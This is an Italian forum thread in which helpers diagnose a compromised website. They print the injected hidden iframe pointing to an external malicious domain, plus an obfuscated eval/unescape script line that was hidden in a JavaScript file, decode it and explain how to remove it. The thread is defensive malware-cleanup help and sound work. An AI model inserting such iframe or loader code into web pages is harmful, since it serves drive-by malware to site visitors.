Un virus affligge sempre il mio sito

[dario79]

Ciao ragazzi, il mio sito hostato su aruba è sempre afflitto da un virus o worm, questo non lo so, che ne impedisce molto spesso la visualizzazione

il sito è su:
www.sd-studio.it e funziona 5 volte su 10

le restanti volte mi appare questa porcheria:



ho provato a scaricare il contenuto su pc farne una scansione con nod32 e riupparlo ma niente il problema persiste ancora

che roba è?
Grazie per l'aiuto!
Dario

[emmebì]

Prova a cambiare le password di accesso FTP al sito, rimuovere eventuali script javascript che non conosci e modificare il login con cui l'applicazione accede al database.

[dario79]

Chi mi sa dire qual'è il messaggio di errore che l'antivirus mostra quando ci si connette al sito?
A me non da nessun problema invece mi è stato detto da molti che il sito incasina sempre il browser e l'antivirus si incavola

[Habanero]

Al momento sul sito non rilevo disfunzioni.
Analizzando il codice però si trova un iframe alla fine di ogni pagina:

codice:

<iframe src="http://049c1g.davtraff.com/tomi/?t=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

la pagina che si tenta di caricare non è più disponibile e quindi non dovrebbe creare problemi. In ogni caso ti suggerisco caldamente di eliminare tale riga da ogni tua pagina.

[webnet]

Con avast trova virus trojan ttp://www.sd-studio.it/collapsibleText.js
controlla nella folder ttp://www.sd-studio.it/script/ tramite ftp.
Se non riesci contatta il provider che dovrebbe controllare e risolvere.

ciao

[Habanero]

A me Avast non aveva segnalato nulla..

In ogni caso quello script è effettivamente infetto


La parte dannosa la trovi alla riga 121. Hanno tentato di camuffare lo script inserendo dopo il codice legittimo una lunga serie di invio a capo fino alla riga 121. La riga 121 comincia con una lunga serie di spazi e il codice danoso è tutto su quella linea:

codice:

/* a0b4df006e02184c60dbf503e71c87ad */ ;eval(unescape('%69%66%20%28%21%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%4A%53%53%53%27%29%29%7B%20%4A%53%53%31%20%3D%20%35%39%3B%20%4A%53%53%32%20%3D%20%32%34%39%36%37%34%33%3B%20%4A%53%53%33%20%3D%20%27%2F%64%69%72%2F%61%64%6D%69%6E%2F%6A%6F%78%69%2F%64%75%6D%6D%79%2E%68%74%6D%27%3B%20%76%61%72%20%6A%73%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72%63%27%2C%20%27%2F%64%69%72%2F%61%64%6D%69%6E%2F%6A%6F%78%69%2F%63%68%65%63%6B%2E%6A%73%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%69%64%27%2C%20%27%4A%53%53%53%27%29%3B%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%2E%69%74%65%6D%28%30%29%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%6A%73%29%20%7D%3B%20')); /* a995d2cc661fa72452472e9554b5520c */

Una volta decodificato lo script esegue:

codice:

if (!document.getElementById('JSSS'))
{ 
    JSS1 = 59; 
    JSS2 = 2496743; 
    JSS3 = '/dir/admin/joxi/dummy.htm'; 
    var js = document.createElement('script'); 
    js.setAttribute('src', '/dir/admin/joxi/check.js'); 
    js.setAttribute('id', 'JSSS'); 
    document.getElementsByTagName('head').item(0).appendChild(js) 
};

attraverso il DOM viene inserito nel documento un tag <script> caricato dal percorso: /dir/admin/joxi/check.js

Mi sembra che tale percorso non esista sul tuo server... l'hai per caso cancellato?
In ogni caso ti consiglio di eliminare da collapsibleText.js tutto quello che sta dopo la riga 21 (potrebbero sembrarti solo righe vuote ma così non è).
Verifica inoltre che il percorso /dir/admin/joxi/ non esista o che comunque non contenga file sospetti (check.js oppure dummy.htm

Inoltre elimina l'iframe di cui ti ho parlato nel mio precedente post.

[dario79]

l'ho cancellato io...

mi chiedo però come possa essere successo che venga scritto del codice su dei file residenti sul server che ho solo sovrascritto attraverso il mio client ftp

[Habanero]

Originariamente inviato da dario79
l'ho cancellato io...

mi chiedo però come possa essere successo che venga scritto del codice su dei file residenti sul server che ho solo sovrascritto attraverso il mio client ftp

http://forum.html.it/forum/showthrea...0#post12495500

[dario79]

grazie troppo gentili

ora dovrebbe essere tutto ok, confermate?

Inoltre mi fa una cosa strana:

quando cerco il sito da google toolbar e clicco sul risultato mi esce Internal Server Error come se il sito fosse irraggiungibile mentre se scrivo direttamente l'url nel browser tutto è a posto

possono esserci ancora problemi secondo voi?
grazie ancora

[Habanero]

Originariamente inviato da dario79
Inoltre mi fa una cosa strana:

quando cerco il sito da google toolbar e clicco sul risultato mi esce Internal Server Error come se il sito fosse irraggiungibile mentre se scrivo direttamente l'url nel browser tutto è a posto

possono esserci ancora problemi secondo voi?

Questo mi fa sospettare che sia stato modificato anche il (oppure i) file .htaccess presenti sul tuo sito... probabilmente sono stati aggiunte delle voci di URL rewriting che filtrano sul referer (google)... il fatto che intervenga un Internal server Error suggerisce che il rewriting sia errato.

Puoi mandarmi (anche in privato) il file .htaccess in questione? Lo trovi nella cartella radice del sito. Potrebbe inoltre essercene uno in ogni sotto cartella.